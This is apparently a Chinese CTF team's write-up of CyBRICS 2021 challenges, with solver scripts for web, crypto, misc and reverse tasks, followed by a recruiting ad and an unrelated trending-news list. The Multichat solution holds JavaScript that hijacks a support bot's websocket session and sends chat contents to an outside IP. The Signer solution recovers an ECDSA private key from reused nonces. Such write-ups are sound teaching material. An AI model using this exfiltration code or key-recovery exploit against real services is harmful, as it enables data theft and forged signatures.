CyBRICS 2021-WriteUp
Web
Ad Network
根据要求重定向1337次即可,url在左上角的动图
import requests
a=requests.session()
a.max_redirects=1338
flag=a.get('http://adnetwork-cybrics2021.ctf.su/adnetwork')
print(flag.text)
Multichat
根据题目描述,向有管理员和技术支持的私密房间内发送特定的字符串,管理员将会在私密房间内把 flag 发出来。
在题目中发现了能够提交url并让技术支持点击url的地方http://multichat-cybrics2021.ctf.su:5000/
对原有的聊天室的 js 函数进行修改,直接进行 websocket 链接并发送Hey, i forgot the flag. Can you remind me?
,在获取聊天室内容后,将聊天室内容通过 http 请求发送到自己的服务器上。将修改了的网页挂在自己的服务器上,此时若有人访问该页面,将直接往已连接的了聊天室发送特定的字符串并将聊天室的内容返回到我们自己的服务器上
function connect() {
if (window["WebSocket"]) {
conn = new WebSocket("ws://multichat-cybrics2021.ctf.su/ws");
conn.onclose = function (evt) {
var item = "";
if (evt.code === 1003) {
item = `Status: ${evt.reason}`;
} else {
item = "Connection closed.";
}
appendLog(item);
};
conn.onopen = function (evt) {
appendLog("Connected");
conn.send("Hey, i forgot the flag. Can you remind me?");
};
conn.onmessage = function (evt) {
appendLog(evt.data);
request.open('GET','http://120.55.164.48:1234/?a='+evt.data,true);
request.send();
};
} else {
appendLog("Your browser does not support WebSockets.");
}
}
window.onload = function () {
var room = getRandomInt(1000, 9999999999);
var msg = document.getElementById("msg");
var log = document.getElementById("log");
connect();
document.getElementById("form").onsubmit = function () {
if (!conn) {
return false;
}
if (!msg.value) {
return false;
}
conn.send(msg.value);
sended_message = msg.value;
msg.value = "";
return false;
};
document.getElementById("room").value = room;
}
把url发过去给技术点,查看服务器的访问记录直接拿flag
Misc
Scanner
游戏一共五关,最后一关得到二维码的 gif,PS 得到
cybrics{N0w_Y0u_4r3_4_c4sh13r_LOL}
CAPTCHA The Flag
使用 stegsolve 连续查看 25 张图中隐写的验证码,输入正确后即可获得 flag
cybrics{a_k33n_Ey3_wi11_sp0T_r1GhT_aw4Y}
Crypto
Signer
'''
@author: badmonkey
@software: PyCharm
@file: exp.py
@time: 2021/7/25 下午1:34
'''
from pwn import *
from ecdsa import ecdsa as ec
from Crypto.Util.number import *
from hashlib import md5
ip = "109.233.61.10"
port = 10105
context.log_level = "debug"
g = ec.generator_192
N = g.order()
sh = remote(ip,port)
sh.recvuntil(">")
sh.sendline("1")
r1,s1,h1 = eval(sh.recvall().strip())
sh.close()
sh = remote(ip,port)
sh.recvuntil(">")
sh.sendline("1")
r2,s2,h2 = eval(sh.recvall().strip())
sh.close()
k = ((h2-h1)*inverse(s2-s1,N))%N
x = (inverse(r1,N)*(k*s1-h1))%N
pub = ec.Public_key(g,g*x)
pri = ec.Private_key(pub,x)
sh = remote(ip,port)
sh.recvuntil(">")
sh.sendline("2")
payload = sh.recvline().strip()[-19:-2]
m = int(md5(payload).hexdigest(),16)
sig = pri.sign(m,2333)
sh.sendline("{},{}".format(sig.r,sig.s))
sh.interactive()
Reverse
listing
a1 = [0xd1,0xd3,0x76,0x23,0x35,0x61,0x9a,0xab]
b1 = [0x01,0x00,0x03,0x02,0x05,0x04,0x07,0x06]
c1 = [0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]
h1 = 0
for i in range(8):
c1[i] = a1[b1[i]]
for i in range(8):
h1 += c1[i]<<(8*(7-i))
print(hex(h1 ^ 0xb0b045130550cafe))
a2 = [0xd5,0xd5,0x23,0x27,0x35,0x65,0x83,0xf8]
b2 = [0x09,0x08,0x0b,0x0a,0x0c,0x0d,0x0f,0x0e]
c2 = [0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]
for i in range(8):
c2[i] = a2[b2[i]%0x8]
h2 = 0
for i in range(8):
h2 += c2[i]<<(8*(7-i))
print(hex(h2 ^ 0xb0b045130550cafe))
a3 = [0xc9,0xd3,0x61,0x27,0x33,0x6c,0x85,0xb9]
b3 = [0x11,0x10,0x13,0x12,0x15,0x14,0x17,0x16]
c3 = [0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]
for i in range(8):
c3[i] = a3[b3[i]%0x10]
h3 = 0
for i in range(8):
h3 += c3[i]<<(8*(7-i))
print(hex(h3 ^ 0xb0b045130550cafe))
a4 = [0xd5,0xd6,0x22,0x71,0x31,0x61,0xcb,0xf8]
b4 = [0x19,0x18,0x1b,0x1a,0x1c,0x1d,0x1f,0x1e]
c4 = [0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]
h4 = 0
for i in range(8):
c4[i] = a4[b4[i]%0x18]
for i in range(8):
h4 += c4[i]<<(8*(7-i))
print(hex(h4 ^ 0xb0b045130550cafe))
#[rdi] = {h3,h4,h1,h2}
from typing import *
from Crypto.Util.number import long_to_bytes
result = 'd1d3762335619aabd5d52327356583f8c9d36127336c85b9d5d622713161cbf8'
k1 = 'feca50051345b0b0feca50051345b0b0feca50051345b0b0feca50051345b0b0'
k2 = '010003020504070609080b0a0c0d0f0e111013121514171619181b1a1c1d1f1e'
def bigtolittle(s):
ss = []
for i in range(0, len(s), 2):
ss = [s[i:i+2]] + ss
return ''.join(ss)
def rev(dest, src2):
dest_bin = bin(int(dest, 16))[2:].zfill(256)
src2_bin = bin(int(src2, 16))[2:].zfill(256)
src1 = [0] * 32
cnt = 0
src2_bin_f = src2_bin[:128]
src2_bin_b = src2_bin[128:]
dest_bin_f = dest_bin[:128]
dest_bin_b = dest_bin[128:]
for i in range(0, len(src2_bin_f), 8):
if src2_bin_f[i] == '0':
idx = int(src2_bin_f[4+i:4+i+4], 2)
src1[idx] = dest_bin_f[i:i+8]
else:
src1[idx] = '?' * 8
for i in range(0, len(src2_bin_b), 8):
if src2_bin_b[i] == '0':
idx = int(src2_bin_b[4+i:4+i+4], 2)
src1[idx + 16] = dest_bin_b[i:i+8]
else:
src1[idx] = '?' * 8
return ''.join(src1)
result = bigtolittle(result)
k1 = bigtolittle(k1)
k2 = bigtolittle(k2)
src1 = rev(result, k2)
print(src1)
rdi = int(k1, 16) ^ int(src1, 2)
#rdi = bigtolittle(rdi[2:])
print(long_to_bytes(rdi))
kernel
ssh 连接 dmp 下文件,发现只要满足异或即可
猜测文件位于对应 dev 目录下,构建代码如下:
#include<stdio.h>
#include<stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/time.h>
int main()
{
int fd = open("/dev/ioctl", 2);
char s[100]={0};
unsigned int val = 0x13373389;
struct timeval begin;
gettimeofday(&begin, NULL);
*(unsigned int*)s = val ^ (unsigned int)begin.tv_sec;
ioctl(fd, 0x5702, s);
puts(s);
}
编译为 elf 文件再将其 ssh 传输到对应目录下远程执行,即可获取 flag
end
招新小广告
ChaMd5 Venom 招收大佬入圈
新成立组IOT+工控+样本分析 长期招新
欢迎联系admin@chamd5.org
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
随时掌握互联网精彩
- 1 奋力打开改革发展新天地 7960697
- 2 36岁女子看高血压查出怀孕34周 7965707
- 3 日本火山喷发灰柱高达3400米 7897319
- 4 “冷资源”里的“热经济” 7726965
- 5 刘诗诗方辟谣离婚 7620619
- 6 女子8年生6个女儿第7胎再产女 7507026
- 7 #胡锡进的2024年终总结# 7461646
- 8 肖战新片射雕英雄传郭靖造型曝光 7342481
- 9 女法官遇害案凶手被判死刑 7205941
- 10 蒋欣生图更是妈妈级别 7175590